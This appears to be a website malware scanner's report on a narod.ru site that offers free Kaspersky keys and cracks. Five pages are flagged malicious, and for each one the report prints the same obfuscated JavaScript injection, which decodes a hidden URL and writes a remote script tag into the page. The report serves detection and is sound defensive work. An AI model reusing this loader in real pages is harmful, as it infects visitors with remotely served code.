Scanned pages/files
Request | Server response | Status |
http://s-ghayuio.narod.ru/rossiya/skachat-licenzionnye-kluchi-dlya-kasperskogo-2009.html | 200 OK Content-Length: 11410 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s205.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.932282055257271 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://s-ghayuio.narod.ru/abnl/?adsdata=G!LCGgzlFCdiOqHQqH5plBBIhWEwfg4JAxFjr9BzUmmU!RnHfMkLQTyRp35HvmnKwqsAMw4uNWfKJue1tfPQXCrZTa7C3Yb4pMJIX8sce^fjduZO10ydVS0UadOrSlpOKeH4qvTtrJhCEecKiYXWxT1UHjuwElSWRBG3AlvB4LVxty7ra4KugLnMHXmv7qFo | 200 OK Content-Length: 2533 Content-Type: application/javascript | clean |
http://s-ghayuio.narod.ru/wp-includes/js/comment-reply.js?ver=20081210 | 200 OK Content-Length: 1222 Content-Type: text/javascript | clean |
http://s-ghayuio.narod.ru/avto/keys-kaspersky-800506.html | 200 OK Content-Length: 9982 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s205.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.218178057655543 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://s-ghayuio.narod.ru/abnl/?adsdata=1cgQqiVcN9mN7x!rWcb969O;1i6gMa43vzlEAfJpyX8^CdNhgNiUXbOa9PgyFKiwA6mjUM8MngXO45LjBaEfDDuVufRvWev0HxZ3JBYOp67bjHK1vv3^Gs5Q3B8bVJL4nq4LTql0tzrrEDIWjQqRlptm0mPgG;pVLSUiE8D5X4qhZAZIVqtIxJ5sv3hv7REo | 200 OK Content-Length: 2529 Content-Type: application/javascript | clean |
http://s-ghayuio.narod.ru/biznes/antivirus-kasperskogo-skachat-kluch-besplatno.html | 200 OK Content-Length: 10351 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s205.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.965849037301066 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://s-ghayuio.narod.ru/abnl/?adsdata=CVVTACJQKn^5H842kvNM22^AW7MmnzE0D4aKJj0zDphIMAlp^NBI4Ol4KzmZOWN2Iabc3A2hXCAhDLe4nebDhM3w4X;8LQ;IBqSZ31AZB6A^j!aHkMUVgLpFHw5nSii6El7XSbZ8iBAC9mTh4n2gXpG22JwJph6Hc75lYCJ0uqnOAe3UX0FvMujkER5FWwoo | 200 OK Content-Length: 2501 Content-Type: application/javascript | clean |
http://s-ghayuio.narod.ru/umor/besplatnyy-mesyachnyy-kluch-aktivacii-kasperskiy.html | 200 OK Content-Length: 10258 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s205.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.438044601629176 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://s-ghayuio.narod.ru/abnl/?adsdata=IHwy!Fs0k6P7SG3anD^I6AGSez5DRyDjgrWc2kfy!OALlvFxUKrRNOmwQ5n638PtUTbvqh^!2QfZLz;XHctQpP3zg8PvJ2WZtENeAMuxgOcIDRwEIUK7xAsAQ6UdkE!Y0MlzUafkyldWU3lQyKbq3tOfckLxktbK8PU4HtlyED1HD5WKrNfjfmtNSHzi | 200 OK Content-Length: 2529 Content-Type: application/javascript | clean |
http://s-ghayuio.narod.ru/pressa/skachat-besplatno-kryak-dlya-kasperskogo.html | 200 OK Content-Length: 10647 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s205.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.16213012884986 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: s-ghayuio.narod.ru
Result:
GET / HTTP/1.1
Host: s-ghayuio.narod.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: s-ghayuio.narod.ru
Referer: http://www.google.com/search?q=s-ghayuio.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: s-ghayuio.narod.ru
Referer: http://www.google.com/search?q=s-ghayuio.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=s-ghayuio.narod.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://s-ghayuio.narod.ru/
Result: s-ghayuio.narod.ru is not infected or malware details are not published yet.
Result: s-ghayuio.narod.ru is not infected or malware details are not published yet.